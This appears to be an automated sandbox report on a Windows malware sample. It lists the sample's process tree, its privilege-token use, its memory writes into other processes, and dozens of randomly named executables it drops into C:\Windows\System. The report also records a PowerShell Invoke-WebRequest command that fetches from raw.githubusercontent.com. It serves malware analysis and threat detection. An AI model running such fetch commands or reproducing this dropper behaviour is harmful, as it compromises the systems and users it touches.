File created	C:\Windows\System\XjvVCNV.exe	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe
File created	C:\Windows\System\JWHWsIG.exe	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe
File created	C:\Windows\System\HPNLywZ.exe	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2428	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeLockMemoryPrivilege	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2408 wrote to memory of 2428	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	29
PID 2408 wrote to memory of 2428	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	29
PID 2408 wrote to memory of 2428	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	29
PID 2408 wrote to memory of 1400	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	30
PID 2408 wrote to memory of 1400	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	30
PID 2408 wrote to memory of 1400	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	30
PID 2408 wrote to memory of 2724	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	31
PID 2408 wrote to memory of 2724	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	31
PID 2408 wrote to memory of 2724	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	31
PID 2408 wrote to memory of 2904	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	32
PID 2408 wrote to memory of 2904	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	32
PID 2408 wrote to memory of 2904	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	32
PID 2408 wrote to memory of 2636	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	33
PID 2408 wrote to memory of 2636	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	33
PID 2408 wrote to memory of 2636	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	33
PID 2408 wrote to memory of 2164	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	34
PID 2408 wrote to memory of 2164	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	34
PID 2408 wrote to memory of 2164	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	34
PID 2408 wrote to memory of 2548	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	35
PID 2408 wrote to memory of 2548	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	35
PID 2408 wrote to memory of 2548	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	35
PID 2408 wrote to memory of 2772	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	36
PID 2408 wrote to memory of 2772	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	36
PID 2408 wrote to memory of 2772	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	36
PID 2408 wrote to memory of 2556	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	37
PID 2408 wrote to memory of 2556	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	37
PID 2408 wrote to memory of 2556	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	37
PID 2408 wrote to memory of 2516	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	38
PID 2408 wrote to memory of 2516	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	38
PID 2408 wrote to memory of 2516	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	38
PID 2408 wrote to memory of 2588	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	39
PID 2408 wrote to memory of 2588	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	39
PID 2408 wrote to memory of 2588	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	39
PID 2408 wrote to memory of 2072	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	40
PID 2408 wrote to memory of 2072	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	40
PID 2408 wrote to memory of 2072	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	40
PID 2408 wrote to memory of 2680	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	41
PID 2408 wrote to memory of 2680	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	41
PID 2408 wrote to memory of 2680	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	41
PID 2408 wrote to memory of 2000	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	42
PID 2408 wrote to memory of 2000	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	42
PID 2408 wrote to memory of 2000	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	42
PID 2408 wrote to memory of 2856	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	43
PID 2408 wrote to memory of 2856	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	43
PID 2408 wrote to memory of 2856	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	43
PID 2408 wrote to memory of 2972	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	44
PID 2408 wrote to memory of 2972	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	44
PID 2408 wrote to memory of 2972	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	44
PID 2408 wrote to memory of 2968	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	45
PID 2408 wrote to memory of 2968	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	45
PID 2408 wrote to memory of 2968	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	45
PID 2408 wrote to memory of 888	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	46
PID 2408 wrote to memory of 888	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	46
PID 2408 wrote to memory of 888	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	46
PID 2408 wrote to memory of 1684	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	47
PID 2408 wrote to memory of 1684	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	47
PID 2408 wrote to memory of 1684	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	47
PID 2408 wrote to memory of 2248	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	48
PID 2408 wrote to memory of 2248	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	48
PID 2408 wrote to memory of 2248	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	48
PID 2408 wrote to memory of 2168	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	49
PID 2408 wrote to memory of 2168	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	49
PID 2408 wrote to memory of 2168	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	49
PID 2408 wrote to memory of 2500	2408	20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe	50

C:\Users\Admin\AppData\Local\Temp\20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\20288bc83f84b6c2744ba242f487010f9b99bf4b9f7d7bdc1062b4bd6a29abab_NeikiAnalytics.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Windows\System\eunJPVY.exe
  C:\Windows\System\eunJPVY.exe
  2⤵
  - Executes dropped EXE
  PID:1400
- C:\Windows\System\SEFwmtl.exe
  C:\Windows\System\SEFwmtl.exe
  2⤵
  - Executes dropped EXE
  PID:2724
- C:\Windows\System\DrVEXzp.exe
  C:\Windows\System\DrVEXzp.exe
  2⤵
  - Executes dropped EXE
  PID:2904
- C:\Windows\System\AYxOnpX.exe
  C:\Windows\System\AYxOnpX.exe
  2⤵
  - Executes dropped EXE
  PID:2636
- C:\Windows\System\ZDzREGM.exe
  C:\Windows\System\ZDzREGM.exe
  2⤵
  - Executes dropped EXE
  PID:2164
- C:\Windows\System\iWvUVYE.exe
  C:\Windows\System\iWvUVYE.exe
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\Windows\System\BEyzfZN.exe
  C:\Windows\System\BEyzfZN.exe
  2⤵
  - Executes dropped EXE
  PID:2772
- C:\Windows\System\iiyzVvy.exe
  C:\Windows\System\iiyzVvy.exe
  2⤵
  - Executes dropped EXE
  PID:2556
- C:\Windows\System\MsJzHEk.exe
  C:\Windows\System\MsJzHEk.exe
  2⤵
  - Executes dropped EXE
  PID:2516
- C:\Windows\System\tWuHUdT.exe
  C:\Windows\System\tWuHUdT.exe
  2⤵
  - Executes dropped EXE
  PID:2588
- C:\Windows\System\YvZNvSa.exe
  C:\Windows\System\YvZNvSa.exe
  2⤵
  - Executes dropped EXE
  PID:2072
- C:\Windows\System\svZzcQu.exe
  C:\Windows\System\svZzcQu.exe
  2⤵
  - Executes dropped EXE
  PID:2680
- C:\Windows\System\HdwXkKx.exe
  C:\Windows\System\HdwXkKx.exe
  2⤵
  - Executes dropped EXE
  PID:2000
- C:\Windows\System\MuqakXz.exe
  C:\Windows\System\MuqakXz.exe
  2⤵
  - Executes dropped EXE
  PID:2856
- C:\Windows\System\RlXScAp.exe
  C:\Windows\System\RlXScAp.exe
  2⤵
  - Executes dropped EXE
  PID:2972
- C:\Windows\System\jSfAOKR.exe
  C:\Windows\System\jSfAOKR.exe
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Windows\System\AUTVuiT.exe
  C:\Windows\System\AUTVuiT.exe
  2⤵
  - Executes dropped EXE
  PID:888
- C:\Windows\System\FfYtHPk.exe
  C:\Windows\System\FfYtHPk.exe
  2⤵
  PID:1684
- C:\Windows\System\VxGaljN.exe
  C:\Windows\System\VxGaljN.exe
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\Windows\System\hgdWQsw.exe
  C:\Windows\System\hgdWQsw.exe
  2⤵
  PID:2168
- C:\Windows\System\iHYfcRh.exe
  C:\Windows\System\iHYfcRh.exe
  2⤵
  - Executes dropped EXE
  PID:2500
- C:\Windows\System\pNbJXCf.exe
  C:\Windows\System\pNbJXCf.exe
  2⤵
  PID:2748
- C:\Windows\System\UlSIuMP.exe
  C:\Windows\System\UlSIuMP.exe
  2⤵
  - Executes dropped EXE
  PID:304
- C:\Windows\System\uZbKXjG.exe
  C:\Windows\System\uZbKXjG.exe
  2⤵
  PID:1560
- C:\Windows\System\ztTITRJ.exe
  C:\Windows\System\ztTITRJ.exe
  2⤵
  - Executes dropped EXE
  PID:1604
- C:\Windows\System\Adapczz.exe
  C:\Windows\System\Adapczz.exe
  2⤵
  PID:1508
- C:\Windows\System\cnHWdcI.exe
  C:\Windows\System\cnHWdcI.exe
  2⤵
  - Executes dropped EXE
  PID:1136
- C:\Windows\System\mKAcrBk.exe
  C:\Windows\System\mKAcrBk.exe
  2⤵
  PID:2284
- C:\Windows\System\BeIgvTH.exe
  C:\Windows\System\BeIgvTH.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\sAaGSUp.exe
  C:\Windows\System\sAaGSUp.exe
  2⤵
  PID:1920
- C:\Windows\System\XUEKhxU.exe
  C:\Windows\System\XUEKhxU.exe
  2⤵
  - Executes dropped EXE
  PID:552
- C:\Windows\System\qpUNRHw.exe
  C:\Windows\System\qpUNRHw.exe
  2⤵
  PID:1748
- C:\Windows\System\xrdqVDx.exe
  C:\Windows\System\xrdqVDx.exe
  2⤵
  - Executes dropped EXE
  PID:1640
- C:\Windows\System\SFdTrcf.exe
  C:\Windows\System\SFdTrcf.exe
  2⤵
  PID:1520
- C:\Windows\System\VRQQCrQ.exe
  C:\Windows\System\VRQQCrQ.exe
  2⤵
  - Executes dropped EXE
  PID:1864
- C:\Windows\System\sEXSbya.exe
  C:\Windows\System\sEXSbya.exe
  2⤵
  PID:1960
- C:\Windows\System\NpUPKnz.exe
  C:\Windows\System\NpUPKnz.exe
  2⤵
  - Executes dropped EXE
  PID:444
- C:\Windows\System\iYAfLqC.exe
  C:\Windows\System\iYAfLqC.exe
  2⤵
  PID:1804
- C:\Windows\System\UwqDZwa.exe
  C:\Windows\System\UwqDZwa.exe
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Windows\System\FHynqph.exe
  C:\Windows\System\FHynqph.exe
  2⤵
  PID:1764
- C:\Windows\System\AtkqMzw.exe
  C:\Windows\System\AtkqMzw.exe
  2⤵
  - Executes dropped EXE
  PID:968
- C:\Windows\System\MsZePPE.exe
  C:\Windows\System\MsZePPE.exe
  2⤵
  PID:1536
- C:\Windows\System\mJDaSMv.exe
  C:\Windows\System\mJDaSMv.exe
  2⤵
  - Executes dropped EXE
  PID:2036
- C:\Windows\System\TmyuAMc.exe
  C:\Windows\System\TmyuAMc.exe
  2⤵
  PID:1348
- C:\Windows\System\cYobKgm.exe
  C:\Windows\System\cYobKgm.exe
  2⤵
  - Executes dropped EXE
  PID:2092
- C:\Windows\System\KoNytpF.exe
  C:\Windows\System\KoNytpF.exe
  2⤵
  PID:2788
- C:\Windows\System\brxSetb.exe
  C:\Windows\System\brxSetb.exe
  2⤵
  - Executes dropped EXE
  PID:2928
- C:\Windows\System\QHeJHfY.exe
  C:\Windows\System\QHeJHfY.exe
  2⤵
  PID:896
- C:\Windows\System\NfoSRwz.exe
  C:\Windows\System\NfoSRwz.exe
  2⤵
  - Executes dropped EXE
  PID:604
- C:\Windows\System\WPMoWJJ.exe
  C:\Windows\System\WPMoWJJ.exe
  2⤵
  PID:2336
- C:\Windows\System\dsdLfpw.exe
  C:\Windows\System\dsdLfpw.exe
  2⤵
  - Executes dropped EXE
  PID:1256
- C:\Windows\System\rLKvZmD.exe
  C:\Windows\System\rLKvZmD.exe
  2⤵
  PID:2476
- C:\Windows\System\NTmQaOw.exe
  C:\Windows\System\NTmQaOw.exe
  2⤵
  - Executes dropped EXE
  PID:1064
- C:\Windows\System\KGislnX.exe
  C:\Windows\System\KGislnX.exe
  2⤵
  PID:1740
- C:\Windows\System\cPqBuDa.exe
  C:\Windows\System\cPqBuDa.exe
  2⤵
  - Executes dropped EXE
  PID:2272
- C:\Windows\System\VISlXWw.exe
  C:\Windows\System\VISlXWw.exe
  2⤵
  PID:1148
- C:\Windows\System\uyZCduc.exe
  C:\Windows\System\uyZCduc.exe
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Windows\System\kkZZiwE.exe
  C:\Windows\System\kkZZiwE.exe
  2⤵
  PID:2888
- C:\Windows\System\PWEFWcN.exe
  C:\Windows\System\PWEFWcN.exe
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\Windows\System\rKFiYLV.exe
  C:\Windows\System\rKFiYLV.exe
  2⤵
  PID:872
- C:\Windows\System\rATvXos.exe
  C:\Windows\System\rATvXos.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Windows\System\eMeLLdA.exe
  C:\Windows\System\eMeLLdA.exe
  2⤵
  PID:1992
- C:\Windows\System\QvVdjGl.exe
  C:\Windows\System\QvVdjGl.exe
  2⤵
  - Executes dropped EXE
  PID:1584
- C:\Windows\System\wdsdiEf.exe
  C:\Windows\System\wdsdiEf.exe
  2⤵
  PID:1588
- C:\Windows\System\WIOhJxt.exe
  C:\Windows\System\WIOhJxt.exe
  2⤵
  - Executes dropped EXE
  PID:3060
- C:\Windows\System\BWhOyXM.exe
  C:\Windows\System\BWhOyXM.exe
  2⤵
  PID:1688
- C:\Windows\System\drSxLhu.exe
  C:\Windows\System\drSxLhu.exe
  2⤵
  - Executes dropped EXE
  PID:2732
- C:\Windows\System\sReLBuQ.exe
  C:\Windows\System\sReLBuQ.exe
  2⤵
  PID:2620
- C:\Windows\System\OgzbtoH.exe
  C:\Windows\System\OgzbtoH.exe
  2⤵
  - Executes dropped EXE
  PID:2520
- C:\Windows\System\SQDTGkG.exe
  C:\Windows\System\SQDTGkG.exe
  2⤵
  PID:2780
- C:\Windows\System\HbnvvBW.exe
  C:\Windows\System\HbnvvBW.exe
  2⤵
  - Executes dropped EXE
  PID:2676
- C:\Windows\System\PxbYTbG.exe
  C:\Windows\System\PxbYTbG.exe
  2⤵
  PID:2764
- C:\Windows\System\HHqUwuU.exe
  C:\Windows\System\HHqUwuU.exe
  2⤵
  - Executes dropped EXE
  PID:2400
- C:\Windows\System\GCNqEPx.exe
  C:\Windows\System\GCNqEPx.exe
  2⤵
  PID:2684
- C:\Windows\System\BdzetTj.exe
  C:\Windows\System\BdzetTj.exe
  2⤵
  - Executes dropped EXE
  PID:2848
- C:\Windows\System\FhBodLD.exe
  C:\Windows\System\FhBodLD.exe
  2⤵
  PID:2560
- C:\Windows\System\SCnvivn.exe
  C:\Windows\System\SCnvivn.exe
  2⤵
  - Executes dropped EXE
  PID:2876
- C:\Windows\System\mXDdKTL.exe
  C:\Windows\System\mXDdKTL.exe
  2⤵
  PID:2552
- C:\Windows\System\MPItsgO.exe
  C:\Windows\System\MPItsgO.exe
  2⤵
  - Executes dropped EXE
  PID:2456
- C:\Windows\System\fkyvgDc.exe
  C:\Windows\System\fkyvgDc.exe
  2⤵
  PID:264
- C:\Windows\System\mMFeQXU.exe
  C:\Windows\System\mMFeQXU.exe
  2⤵
  - Executes dropped EXE
  PID:1676
- C:\Windows\System\vxwLZbL.exe
  C:\Windows\System\vxwLZbL.exe
  2⤵
  PID:1616
- C:\Windows\System\XHFxKqs.exe
  C:\Windows\System\XHFxKqs.exe
  2⤵
  - Executes dropped EXE
  PID:2468
- C:\Windows\System\AJQbyom.exe
  C:\Windows\System\AJQbyom.exe
  2⤵
  PID:2364
- C:\Windows\System\hDrQjdk.exe
  C:\Windows\System\hDrQjdk.exe
  2⤵
  - Executes dropped EXE
  PID:1948
- C:\Windows\System\aBadXCQ.exe
  C:\Windows\System\aBadXCQ.exe
  2⤵
  PID:1592
- C:\Windows\System\JqKTWNd.exe
  C:\Windows\System\JqKTWNd.exe
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\Windows\System\uXEbJmG.exe
  C:\Windows\System\uXEbJmG.exe
  2⤵
  PID:2360
- C:\Windows\System\tjBELoJ.exe
  C:\Windows\System\tjBELoJ.exe
  2⤵
  - Executes dropped EXE
  PID:1968
- C:\Windows\System\thaIIES.exe
  C:\Windows\System\thaIIES.exe
  2⤵
  PID:1700
- C:\Windows\System\JWtUjQK.exe
  C:\Windows\System\JWtUjQK.exe
  2⤵
  - Executes dropped EXE
  PID:2660
- C:\Windows\System\GPpxQJB.exe
  C:\Windows\System\GPpxQJB.exe
  2⤵
  PID:2512
- C:\Windows\System\gTHwrdi.exe
  C:\Windows\System\gTHwrdi.exe
  2⤵
  - Executes dropped EXE
  PID:3028
- C:\Windows\System\NswLkdd.exe
  C:\Windows\System\NswLkdd.exe
  2⤵
  PID:1652
- C:\Windows\System\ljAyrlC.exe
  C:\Windows\System\ljAyrlC.exe
  2⤵
  - Executes dropped EXE
  PID:2380
- C:\Windows\System\TqaDpyV.exe
  C:\Windows\System\TqaDpyV.exe
  2⤵
  PID:2148
- C:\Windows\System\PqtkneA.exe
  C:\Windows\System\PqtkneA.exe
  2⤵
  - Executes dropped EXE
  PID:3080
- C:\Windows\System\FVoASpt.exe
  C:\Windows\System\FVoASpt.exe
  2⤵
  PID:3096
- C:\Windows\System\CgrMCgf.exe
  C:\Windows\System\CgrMCgf.exe
  2⤵
  - Executes dropped EXE
  PID:3112
- C:\Windows\System\pvcJkCs.exe
  C:\Windows\System\pvcJkCs.exe
  2⤵
  PID:3128
- C:\Windows\System\LqfqBXe.exe
  C:\Windows\System\LqfqBXe.exe
  2⤵
  - Executes dropped EXE
  PID:3144
- C:\Windows\System\TPRfHgi.exe
  C:\Windows\System\TPRfHgi.exe
  2⤵
  PID:3160
- C:\Windows\System\KqZmCoL.exe
  C:\Windows\System\KqZmCoL.exe
  2⤵
  - Executes dropped EXE
  PID:3176
- C:\Windows\System\FYsXEho.exe
  C:\Windows\System\FYsXEho.exe
  2⤵
  PID:3192
- C:\Windows\System\YvMbiJv.exe
  C:\Windows\System\YvMbiJv.exe
  2⤵
  - Executes dropped EXE
  PID:3208
- C:\Windows\System\brIpctD.exe
  C:\Windows\System\brIpctD.exe
  2⤵
  PID:3224
- C:\Windows\System\xbMvpih.exe
  C:\Windows\System\xbMvpih.exe
  2⤵
  - Executes dropped EXE
  PID:3240
- C:\Windows\System\QnWqrDB.exe
  C:\Windows\System\QnWqrDB.exe
  2⤵
  PID:3256
- C:\Windows\System\brIKMnj.exe
  C:\Windows\System\brIKMnj.exe
  2⤵
  - Executes dropped EXE
  PID:3272
- C:\Windows\System\MUhQVyw.exe
  C:\Windows\System\MUhQVyw.exe
  2⤵
  PID:3288
- C:\Windows\System\hejiJQe.exe
  C:\Windows\System\hejiJQe.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Windows\System\sRdIoNz.exe
  C:\Windows\System\sRdIoNz.exe
  2⤵
  PID:3320
- C:\Windows\System\lkflqDG.exe
  C:\Windows\System\lkflqDG.exe
  2⤵
  PID:3336
- C:\Windows\System\LrWkgBn.exe
  C:\Windows\System\LrWkgBn.exe
  2⤵
  PID:3352
- C:\Windows\System\asyZEme.exe
  C:\Windows\System\asyZEme.exe
  2⤵
  PID:3368
- C:\Windows\System\xaZRvbb.exe
  C:\Windows\System\xaZRvbb.exe
  2⤵
  PID:3384
- C:\Windows\System\JDYJrLj.exe
  C:\Windows\System\JDYJrLj.exe
  2⤵
  PID:3400
- C:\Windows\System\FurekJP.exe
  C:\Windows\System\FurekJP.exe
  2⤵
  PID:3416
- C:\Windows\System\RYCzHUA.exe
  C:\Windows\System\RYCzHUA.exe
  2⤵
  PID:3432
- C:\Windows\System\JlMhZkL.exe
  C:\Windows\System\JlMhZkL.exe
  2⤵
  PID:3448
- C:\Windows\System\lfGlmhs.exe
  C:\Windows\System\lfGlmhs.exe
  2⤵
  PID:3464
- C:\Windows\System\mcVtrdE.exe
  C:\Windows\System\mcVtrdE.exe
  2⤵
  PID:3480
- C:\Windows\System\Ztyvatg.exe
  C:\Windows\System\Ztyvatg.exe
  2⤵
  PID:3496
- C:\Windows\System\HlNpjXO.exe
  C:\Windows\System\HlNpjXO.exe
  2⤵
  PID:3512
- C:\Windows\System\UPYuoOx.exe
  C:\Windows\System\UPYuoOx.exe
  2⤵
  PID:3528
- C:\Windows\System\oDDTKvQ.exe
  C:\Windows\System\oDDTKvQ.exe
  2⤵
  PID:3544
- C:\Windows\System\sMqzlAt.exe
  C:\Windows\System\sMqzlAt.exe
  2⤵
  PID:3560
- C:\Windows\System\OmyDlIa.exe
  C:\Windows\System\OmyDlIa.exe
  2⤵
  PID:3576
- C:\Windows\System\SlaAvSa.exe
  C:\Windows\System\SlaAvSa.exe
  2⤵
  PID:3592
- C:\Windows\System\jrNVpwh.exe
  C:\Windows\System\jrNVpwh.exe
  2⤵
  PID:3608
- C:\Windows\System\Ncrzrto.exe
  C:\Windows\System\Ncrzrto.exe
  2⤵
  PID:3624
- C:\Windows\System\MZNYxAU.exe
  C:\Windows\System\MZNYxAU.exe
  2⤵
  PID:3640
- C:\Windows\System\ihiuaFE.exe
  C:\Windows\System\ihiuaFE.exe
  2⤵
  PID:3656
- C:\Windows\System\unNUyEc.exe
  C:\Windows\System\unNUyEc.exe
  2⤵
  PID:3672
- C:\Windows\System\BxRFWma.exe
  C:\Windows\System\BxRFWma.exe
  2⤵
  PID:3688
- C:\Windows\System\fAfCimn.exe
  C:\Windows\System\fAfCimn.exe
  2⤵
  PID:3704
- C:\Windows\System\DAlvvEL.exe
  C:\Windows\System\DAlvvEL.exe
  2⤵
  PID:3720
- C:\Windows\System\utTxgmV.exe
  C:\Windows\System\utTxgmV.exe
  2⤵
  PID:3736
- C:\Windows\System\xjsrjSx.exe
  C:\Windows\System\xjsrjSx.exe
  2⤵
  PID:3752
- C:\Windows\System\ScshVWU.exe
  C:\Windows\System\ScshVWU.exe
  2⤵
  PID:3768
- C:\Windows\System\tvVkMxX.exe
  C:\Windows\System\tvVkMxX.exe
  2⤵
  PID:3784
- C:\Windows\System\gHbuHIm.exe
  C:\Windows\System\gHbuHIm.exe
  2⤵
  PID:3800
- C:\Windows\System\UrSCeIg.exe
  C:\Windows\System\UrSCeIg.exe
  2⤵
  PID:3816
- C:\Windows\System\MaQqfCc.exe
  C:\Windows\System\MaQqfCc.exe
  2⤵
  PID:3832
- C:\Windows\System\saFfYLN.exe
  C:\Windows\System\saFfYLN.exe
  2⤵
  PID:3848
- C:\Windows\System\jLwTMWc.exe
  C:\Windows\System\jLwTMWc.exe
  2⤵
  PID:3864
- C:\Windows\System\EezOXmd.exe
  C:\Windows\System\EezOXmd.exe
  2⤵
  PID:3880
- C:\Windows\System\IcXfcQx.exe
  C:\Windows\System\IcXfcQx.exe
  2⤵
  PID:3896
- C:\Windows\System\TTlDjrA.exe
  C:\Windows\System\TTlDjrA.exe
  2⤵
  PID:3912
- C:\Windows\System\oOHtVmC.exe
